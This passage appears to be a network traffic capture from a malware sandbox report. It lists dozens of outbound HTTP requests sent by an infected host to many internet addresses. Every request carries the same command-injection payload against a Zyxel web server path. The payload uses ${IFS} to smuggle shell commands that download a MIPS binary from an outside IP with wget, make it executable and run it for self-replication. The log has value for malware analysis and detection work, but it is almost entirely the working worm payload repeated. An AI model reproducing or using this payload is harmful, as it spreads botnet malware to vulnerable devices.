                                            Jan 14, 2024 15:50:35.330832005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3072192.168.2.235992445.24.174.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330854893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3073192.168.2.235647886.66.188.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330898046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3074192.168.2.233838636.199.19.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330935955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3075192.168.2.2347552143.17.25.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330956936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3076192.168.2.235716864.249.43.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.330991983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3077192.168.2.2333484103.48.10.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331005096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3078192.168.2.2349454152.140.232.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331048012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3079192.168.2.235882657.147.66.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331064939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3080192.168.2.2355094123.160.79.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331094027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3081192.168.2.2352878151.87.78.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331130981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3082192.168.2.234112436.194.89.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331146002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3083192.168.2.233966494.24.207.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331171989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3084192.168.2.2339776165.29.194.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331229925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3085192.168.2.2340518111.221.91.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331249952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3086192.168.2.2356792115.95.196.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331296921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3087192.168.2.2336498124.246.174.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331326008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3088192.168.2.2358336110.125.50.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331372976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3089192.168.2.2347350150.102.145.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331397057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3090192.168.2.2349762165.170.32.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331435919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3091192.168.2.2338362202.61.244.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331454992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3092192.168.2.2359542158.247.18.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331486940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3093192.168.2.2359734172.137.106.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331506968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3094192.168.2.2356480140.127.111.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331541061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3095192.168.2.2345446168.190.117.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331568003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3096192.168.2.2341098128.121.2.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331602097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3097192.168.2.2355018169.218.214.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331618071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3098192.168.2.234881663.47.0.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331666946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3099192.168.2.235111684.185.204.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331682920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3100192.168.2.234614449.110.77.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331723928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3101192.168.2.2357970222.98.241.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331770897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3102192.168.2.235234442.18.120.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331796885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3103192.168.2.2352512125.254.189.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331819057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3104192.168.2.2341676185.205.222.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331832886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3105192.168.2.2351292101.54.187.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331845999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3106192.168.2.234644617.17.38.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331893921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3107192.168.2.2360428160.162.230.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331912041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3108192.168.2.2333492125.42.122.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331939936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3109192.168.2.2333590218.224.71.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.331993103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3110192.168.2.2347990194.122.67.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332036018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3111192.168.2.2354784107.237.93.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332071066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3112192.168.2.234201286.20.180.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332087040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3113192.168.2.2341866122.157.94.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332128048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3114192.168.2.235391249.140.101.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332150936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3115192.168.2.2355512147.191.109.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332178116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3116192.168.2.2346706177.241.202.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332206964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3117192.168.2.235964631.44.227.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332231045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3118192.168.2.2359278153.143.87.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332300901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3119192.168.2.235433013.203.28.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332319975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3120192.168.2.233483867.75.68.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332345009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3121192.168.2.233340083.33.8.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332396984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3122192.168.2.2338104218.170.81.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332427979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3123192.168.2.235031483.161.209.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332463980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3124192.168.2.2354766220.204.176.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332468987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3125192.168.2.2350540104.219.151.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332484961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3126192.168.2.2337774128.103.112.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332521915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3127192.168.2.2348148129.98.15.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332560062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3128192.168.2.234351485.156.63.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332595110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3129192.168.2.233821252.245.71.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332624912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3130192.168.2.2347444134.177.114.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332674980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3131192.168.2.2337654196.172.34.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332703114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3132192.168.2.2346210134.193.115.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332730055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3133192.168.2.2342118107.133.155.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.332775116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3134192.168.2.2338140193.217.252.229443
                                            TimestampBytes transferredDirectionData
